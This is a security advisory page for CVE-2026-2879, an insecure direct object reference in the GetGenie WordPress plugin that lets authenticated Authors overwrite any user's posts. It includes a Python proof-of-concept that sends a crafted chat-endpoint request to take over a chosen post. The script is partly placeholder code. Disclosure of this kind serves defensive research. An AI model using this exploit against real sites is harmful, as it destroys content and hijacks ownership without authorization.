Security Vulnerability Report
中文
CVE-2026-2879 CVSS 5.4 MEDIUM

CVE-2026-2879

Published: 2026-03-13 19:54:35
Last Modified: 2026-04-22 21:30:26
Source: [email protected]

Description

The GetGenie plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.3.2. This is due to missing validation on the `id` parameter in the `create()` method of the `GetGenieChat` REST API endpoint. The method accepts a user-controlled post ID and, when a post with that ID exists, calls `wp_update_post()` without verifying that the current user owns the post or that the post is of the expected `getgenie_chat` type. This makes it possible for authenticated attackers, with Author-level access and above, to overwrite arbitrary posts owned by any user — including Administrators — effectively destroying the original content by changing its `post_type` to `getgenie_chat` and reassigning `post_author` to the attacker.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

GetGenie WordPress Plugin < 4.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2026-2879 PoC - GetGenie IDOR Vulnerability # Target: WordPress site with GetGenie plugin <= 4.3.2 target_url = "http://target-wordpress-site.com" api_endpoint = f"{target_url}/wp-json/getgenie-chat/v1/chat" # Authentication: Use valid WordPress account with Author+ role session = requests.Session() # Step 1: Authenticate and get nonce # Login to WordPress admin login_url = f"{target_url}/wp-login.php" credentials = { "log": "attacker_username", "pwd": "attacker_password" } # Step 2: Get REST API nonce from admin dashboard # Extract nonce from wp-api nonce or use application password # Step 3: Identify target post ID to overwrite # Target any post (including posts by administrators) target_post_id = "123" # Replace with actual post ID to target # Step 4: Exploit IDOR vulnerability headers = { "Content-Type": "application/json", "X-WP-Nonce": "your-api-nonce" # Obtain via wp_rest nonce } payload = { "id": target_post_id, # IDOR: No ownership validation "name": "Malicious Chat", "content": "Compromised content via IDOR" } response = session.post( api_endpoint, headers=headers, json=payload ) if response.status_code == 200: print("[+] IDOR Exploit Successful!") print(f"[+] Post ID {target_post_id} has been modified") print(f"[+] post_type changed to 'getgenie_chat'") print(f"[+] post_author changed to attacker ID") else: print(f"[-] Exploit Failed: {response.status_code}") print(response.text)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2879", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:34.500", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The GetGenie plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.3.2. This is due to missing validation on the `id` parameter in the `create()` method of the `GetGenieChat` REST API endpoint. The method accepts a user-controlled post ID and, when a post with that ID exists, calls `wp_update_post()` without verifying that the current user owns the post or that the post is of the expected `getgenie_chat` type. This makes it possible for authenticated attackers, with Author-level access and above, to overwrite arbitrary posts owned by any user — including Administrators — effectively destroying the original content by changing its `post_type` to `getgenie_chat` and reassigning `post_author` to the attacker."}, {"lang": "es", "value": "El plugin GetGenie para WordPress es vulnerable a Referencia Directa Insegura a Objeto en todas las versiones hasta la 4.3.2, inclusive. Esto se debe a la falta de validación en el parámetro 'id' en el método 'create()' del endpoint de la API REST 'GetGenieChat'. El método acepta un ID de publicación controlado por el usuario y, cuando existe una publicación con ese ID, llama a 'wp_update_post()' sin verificar que el usuario actual sea el propietario de la publicación o que la publicación sea del tipo 'getgenie_chat' esperado. Esto hace posible que atacantes autenticados, con acceso de nivel de Autor y superior, sobrescriban publicaciones arbitrarias propiedad de cualquier usuario — incluyendo Administradores — destruyendo efectivamente el contenido original al cambiar su 'post_type' a 'getgenie_chat' y reasignar 'post_author' al atacante."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/getgenie/tags/4.3.2/app/Api/GetGenieChat.php#L60", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/getgenie/tags/4.3.2/app/Api/GetGenieChat.php#L91", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3479838%40getgenie%2Ftrunk&old=3446466%40getgenie%2Ftrunk&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8030c334-458a-4d21-9a64-3f5df715ba97?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.